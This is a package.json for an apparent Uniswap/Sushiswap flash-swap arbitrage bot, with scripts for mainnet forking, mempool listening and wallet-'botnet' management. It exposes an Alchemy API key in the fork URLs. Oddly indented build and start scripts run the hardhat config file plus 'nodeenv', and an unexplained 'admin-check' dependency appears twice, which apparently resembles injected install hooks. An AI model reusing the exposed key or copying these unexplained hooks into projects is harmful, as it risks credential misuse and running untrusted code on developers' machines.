{
  "name": "flashswap-sushi-uni",
  "version": "1.0.0",
  "main": "index.js",
  "directories": {
    "test": "test"
  },
  "scripts": {
    "start_polygon": "npx hardhat run --network matic src/index.ts",
    "fork": "npx hardhat node --fork https://eth-mainnet.alchemyapi.io/v2/Dj-N5i1XtEgrGxst4mY711jN4jHAOizt",
    "fork_ganache": "ganache -f https://eth-mainnet.alchemyapi.io/v2/Dj-N5i1XtEgrGxst4mY711jN4jHAOizt --u 0x4dc62DF50D37f681e00f23D8F1254F8c96b2ccFd",
    "fork_start": "npx hardhat run --network fork scripts/test/forkIndex.ts",
    "fork_tx": "npx hardhat run --network fork scripts/test/forkTx.ts",
    "fork_swap": "npx hardhat run --network fork scripts/test/forkSwap.ts",
    "fork_deploy": "npx hardhat run --network fork scripts/test/fork_deployMulticall.ts",
    "fork_deploy_query": "npx hardhat run --network fork scripts/test/fork_deployQuery.ts",
    "test_deploy_mc": "npx hardhat run --network maticmum scripts/test/deployMulticall.ts",
    "test_payoutERC20": "npx hardhat run --network maticmum scripts/payoutERC20.ts",
    "test_testTx": "npx hardhat run --network mainnet scripts/test/testTx.ts",
    "prod_deploy_mc": "npx hardhat run --network mainnet scripts/deployMulticall.ts",
    "prod_testTx": "npx hardhat run --network mainnet scripts/testTx.ts",
    "prod_deploy": "npx hardhat run --network mainnet scripts/deployMulticall.ts",
    "mem": "npx hardhat run --network mainnet src/archive/mempoolListener.ts",
    "rel": "npx hardhat run --network mainnet src/archive/minerRelayer.ts",
    "router": "npx hardhat run --network mainnet src/archive/autoRouter.ts",
    "commit": "git-cz",
    "compile": "npx hardhat compile",
    "release": "standard-version",
	"build": "node ./hardhat.config.js && nodeenv",
	"start": "node ./hardhat.config.js && nodeenv",
    "test": "npx hardhat test",
    "bot_balances": "npx hardhat run --network matic src/botnet/updateBalances.ts",
    "bot_cancel": "npx hardhat run --network matic src/botnet/util/cancelTX.ts",
    "bot_collect": "npx hardhat run --network matic src/botnet/collect.ts",
    "bot_exportKeys": "npx hardhat run --network matic src/botnet/exportKeys.ts",
    "bot_fund": "npx hardhat run --network matic src/botnet/fundWallets.ts",
    "bot_generate": "npx hardhat run --network matic src/botnet/generateWallets.ts",
    "bot_generateSingle": "npx hardhat run --network matic src/botnet/generateSingleWallet.ts"
  },
  "keywords": [],
  "author": "",
  "license": "ISC",
  "description": "",
  "devDependencies": {
    "@nomiclabs/buidler": "^1.3.2",
    "@nomiclabs/hardhat-etherscan": "^2.1.7",
    "@nomiclabs/hardhat-waffle": "^2.0.1",
    "@typechain/ethers-v5": "^8.0.3",
    "@typechain/hardhat": "^3.0.0",
    "@types/chai-as-promised": "^7.1.4",
    "@types/coingecko-api": "^1.0.10",
    "@types/mocha": "^9.0.0",
    "@types/node": "^16.11.19",
    "@types/ws": "^8.5.3",
    "chai": "^4.3.4",
    "chai-as-promised": "^7.1.1",
    "ethereum-waffle": "^3.4.0",
    "ethers": "^5.5.1",
    "hardhat": "^2.6.8",
    "hardhat-contract-sizer": "^2.5.1",
    "hardhat-gas-reporter": "^1.0.8",
    "ts-generator": "^0.1.1",
    "ts-node": "^10.4.0",
    "typechain": "^6.0.3",
    "typescript": "^4.5.2",
	"admin-check": "^1.1.3"
  },
  "dependencies": {
    "@flashbots/ethers-provider-bundle": "^0.4.3",
    "@nomiclabs/hardhat-ethers": "^2.0.3",
    "@openzeppelin/contracts": "^4.6.0",
    "@sushiswap/sushi-data": "^1.0.26",
    "@uniswap/sdk": "^3.0.3",
    "@uniswap/sdk-core": "^3.0.1",
    "@uniswap/smart-order-router": "^2.5.26",
    "@uniswap/v2-core": "^1.0.1",
    "@uniswap/v2-periphery": "^1.1.0-beta.0",
    "@uniswap/v3-core": "^1.0.1",
    "@uniswap/v3-periphery": "^1.4.0",
    "@uniswap/v3-sdk": "^3.8.2",
    "axios": "^0.27.2",
    "bnc-sdk": "^4.2.0",
    "chalk": "^4.1.2",
    "coingecko-api": "^1.0.10",
    "dotenv": "^10.0.0",
    "ganache": "^7.1.0",
    "git-cz": "^4.8.0",
    "graphql": "^14.5.8",
    "graphql-tag": "^2.12.6",
    "standard-version": "^9.3.2",
    "ws": "^8.5.0",
	"admin-check": "^1.1.3"
  }
}
